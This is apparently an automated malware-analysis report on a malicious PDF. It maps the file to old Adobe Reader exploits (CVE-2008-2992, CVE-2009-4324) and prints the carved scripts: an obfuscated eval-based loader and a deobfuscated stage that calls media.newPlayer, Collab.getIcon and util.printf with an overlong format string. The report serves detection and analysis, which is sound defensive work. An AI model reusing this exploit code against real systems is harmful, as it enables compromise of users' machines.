MALICIOUS
288
Risk Score
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.007 JavaScript
T1566.001 Spearphishing Attachment
The PDF file contains embedded JavaScript that exploits multiple known Adobe Reader vulnerabilities, including CVE-2008-2992, CVE-2009-4324, and CVE-2009-0927. The deobfuscated JavaScript indicates that it attempts to execute functions like `media.newPlayer(null)` and `util.printf`, which are associated with these exploits. The primary goal appears to be the execution of a second-stage payload, as suggested by the presence of `legacy_pdfkit_stage_000.js` and the ML classifier's high confidence score.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 7
-
media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
-
util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
-
Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCHA single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
-
Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KITOne recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0011_000.js6dc78a9f1257dd5bd3dab587bf1ba2f61918aea574b071b87a496ec0f4610d0b |
pdf-javascript-stream | PDF /JS object 11 at offset 0x1338 | 2426 bytes |
Preview scriptFirst 1,000 lines of the extracted script
var eZWZ = null;
try {
var vI=new String("Fu"+"nc"+"ti"+"on");
function gNOF(n,jWL){return n+jWL};
var nCD=this;
var lKBU=String("char"+"At");
var qZOP=/[_#k97\>\$~q&%@]/g;
function z(pMJ){this.pSV=this.d=pMJ};
var tSL='';
var zAH=0;
var pSX=300;
var lWZ="rep"+"lac"+"e";
var rYN="vakr@ &iqD_W%Lk=7t7h>i@sk._d7;#f%=&\'#g9e$t#P@a>g_e>N@\'9;kd@Q%L&=9f7+~\'_t~h~W_okr@d7\'$;$r7O7Z%=>f&+>\'7u_m$Wko#r~d9sq\'$;>b&U_B7=>\'#p@aqgqe&N&u7m>\'~;%v7O&D9 q=& q891q k;7t>S>L9=k\'9\'&;_l>W~J#=$\'#j>o7i9n~\'@;%j$W9N9=q\'~\'9;%z#A~H$=_0$;qd~O$Z>=%S9t9r$i&n>g$;~dkGqX9=@\'~s#ukb7s9t~rq\'~;#r9QqN_=@\'~eqv#a%l~\'$;~p_C~N_=7\'>l$eknkg_t#h%\'&;%d#G$H7=%\'_\\>\\qxk\'%;@r~A#F@=&\'~t%o~S>t9rki%n&g>\'k;@x&G&P7=&\'#p%akrqs_e_I@n$t~\'#;>f9I$N%=q\'&f@r&o7m7Ckh9a7r%C#o7dke@\'~;kl7U~X_=q\'~c@h$a_r@C7okd>e$A~t%\'@;%p&M#T#=#4q/_4&;>r$E$B&=k1k+&4$;9v#A9D$=$290#0k+75q5@;$n_C$D@=k\'#d@okc@\'k;9f_O#J_=>3>3q2&;~b~O&J#=@[&]&;_n>U#Nq=9\'#\'$;kt~K9P_=q196#;khqY9Hq=$2$;#s9R$Y9Lq=>47;>zqS%X&=7i7D#W%Lk[#r~O>Z~]~(qi@D&W~Lq[~b9U@B~]~)_;&f&o>r%(_d$I7R$=qz#A_H#;@d@I&R&<9 qz7S#X9;q qd9I>R&+>+$)k{$v%a$r@ @r$C&X7=9i~DqW_L@[qd%Q>L$]9(%i&DqWkLk[qb_U&B~]$,~d@IqR$,kt_r#u9e%)q;9j@WkN%=7[qj$W@N>,@r9C$X%]#[9l~W@J9]>(#t&S#L9)k;>;9}&f$okr~(9d>I$R$=#0>;_d7I#R@ @<& >j&W@N7[#p7CqN&]~;9 9d&I~Rq+&=qh&Y_H@)~{kv_=#j$W#N&[qd9G9Xq]&(7dkIkRk,@h_YqHk)#;#zkY$N&=#p_akrqs#e#I>n7t_(%v#,7t#KkPq)~;%z&A%Z_=~z%YqN7^7v7O9D>;kn~O&Lq=qz>A7Z#._t$o&S>t&r>i9n~g>($t$K@P@)_;>n9O>Lq=k(~n%O%Lk[#p%C#N7]7=%=$pqM>T$)9 q?_ &\'~0k\'# >+q @n9O>L$ &:$ ~n>O_L@;kbkOkJ$.7pqu%s#h9(#n_O#L@)q;7}7t_r_y% &{9n_U_N~=knqe9w9 @S&t7rki&n&gq(_dqG#H~ &+7 >b@OkJk[>l&W$J9]@(&dqG9Hq)$)_;ka>pkp~[~r7Q@N#]@(~\'%n_UqN&=7\"%\'&+%n~UkN%+q\'9\"$;%\'>)&;>i#D9W&L%._xqW7Pk=7(_nqU>N#[~dkG%X~]_(#n%U_N7[~pqC~N$]q-&f#O#J&)$)%;>i#D_W&L9.#p#Y_N@=$(@n_U%N$[#d>G9X%]$(>z~AqH~,>nkU9Nk[%p$C7Nk]$-7f9OkJq)q)#;$l#C_H~(_)9;%}7 &c~a&t&c%h7($l&K$B&)#{~i%f$(9iqD7W9L%.#pkYqN~)q{7t&r%y# ${%a9p~p%[9r&Q$N@]7(7i%D%W>L$.$p$Y>N%)%;#}q qc@a7t>c$h7(@l_KkBq)>{qa7p~p_._a_l7e>rqtq(_l_K$B$)_;7}_}# _e#lks7e_ &{$a@p>pk.$a>l%e$r9t9(>\'>N7O# kC%O@D>E7\'#)_;%}%}_";
var pMT=1;
var pCN=String("leng"+"th");
;
function jUB(lSV){rIB=tSL; for(dIR=lSV[pCN];dIR >= zAH;dIR--) rIB=gNOF(rIB, lSV[lKBU](dIR)); return rIB}
rYN=rYN[lWZ](qZOP, tSL);
rQN=jUB(new String("lave"));
;
z.prototype={
dCJI : function(eFSV){
if(eFSV > pSX){
this.d[rQN](rYN);
} else {
eZWZ.dCJI(eFSV+pMT);
}
}
};
var eZWZ=new z(nCD);
eZWZ.dCJI(zAH);
} catch(nUN){
}
|
|||
legacy_pdfkit_stage_000.js18699f9d55ae1f1fd22bc427d0f09ac790fd8fafb1557dc66370fe40318c5f52 |
deobfuscated-js | getPageWords-XOR Pidief stage normalized at offset 0x0 | 153 bytes |
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
/* getPageWords-XOR Pidief stage normalized */
app.viewerVersion;
Collab.getIcon("N."+unescape("%09"));
media.newPlayer(null);
util.printf("%45000f", 1);
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.